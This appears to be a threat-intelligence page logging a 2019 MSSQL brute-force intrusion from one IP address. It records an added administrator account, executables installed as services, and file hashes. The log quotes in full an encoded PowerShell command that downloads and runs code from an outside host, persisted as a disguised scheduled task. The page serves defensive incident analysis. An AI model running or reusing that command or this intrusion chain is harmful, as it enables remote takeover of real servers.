IP Address: 202.90.136.186 - Previously Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker, Scanner

Services Targeted

MSSQL

Tags

IDS - Attempted User Privilege Gain, Download and Execute, SMB Share Connect, Successful SMB Login, Service Start, Listening, Scheduled Task Creation, Service Creation, Execute MsSql Shell Command, User Created, MSSQL, Download File, SMB, Successful MSSQL Login, CMD, MSSQL Brute Force, User Added to Group

Associated Attack Servers

-

Basic Information

IP Address

202.90.136.186

Domain

-

ISP

Department of Science and Technology

Country

Philippines

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2019-04-07

Last seen in Guardicore Centra

2019-11-05

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time.

Attack Flow

A user logged in using MSSQL with the following credentials: sa / **** - Authentication policy: White List (Part of a Brute Force Attempt)

Successful MSSQL Login, MSSQL Brute Force

A user logged in using MSSQL with the following credentials: sa / **** - Authentication policy: Previously Approved User (Part of a Brute Force Attempt)

Successful MSSQL Login, MSSQL Brute Force

MSSQL executed 2 shell commands

Execute MsSql Shell Command

User k8h3d was created with the password ***********, added to groups: Administrators, and logged in using SMB

User Created, User Added to Group, Successful SMB Login

A user logged in using SMB with the following username: k8h3d - Authentication policy: Correct Password

Successful SMB Login

The file C:\Windows\eNgiDGdF.exe was downloaded and executed

Download and Execute

c:\windows\system32\services.exe installed and started %systemroot%\engidgdf.exe as a service named wtTI under service group None

Service Start, Service Creation

C:\Windows\temp\svchost.exe was downloaded

Download File

IDS detected Attempted User Privilege Gain : SQL sp_configure - configuration change

IDS - Attempted User Privilege Gain

IDS detected Attempted User Privilege Gain : sp_password - password change

IDS - Attempted User Privilege Gain

IDS detected Attempted User Privilege Gain : xp_cmdshell - program execution

IDS - Attempted User Privilege Gain

Process netsvcs Service Group started listening on ports: 65533

Listening

The command line powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA= was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\Bluetool

Connection was closed due to timeout

Associated Files

\\server-backup\c$\zilnbirc.exe

SHA256: 3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71

56320 bytes

C:\Windows\temp\svchost.exe

SHA256: 0f366b50baab12a1e162a3f65380fc68bffaa6ee0ed6195aa601fc33d2b775eb

715000 bytes

C:\Windows\temp\svchost.exe

SHA256: 3360d28b9b39dd5b31ac0a13eb411aae83a6504c1b6739b917ccf2c8a88e8bfa

455000 bytes

C:\Windows\temp\svchost.exe

SHA256: 451ab54d9bd72d169f3d4caa26677059d3e55a8ac067c74230509bfe82e14f21

325000 bytes

C:\Windows\temp\svchost.exe

SHA256: 3fcaf42e17eecd794da2695cd3f9c3fc76e69cf8b01fb7b62f7b7331d153abcb

520000 bytes

C:\Windows\temp\svchost.exe

SHA256: c9f4f4788987b69ea452413d093d527d795ce8f961bc34d4ee5c0ca1f369d836

650000 bytes
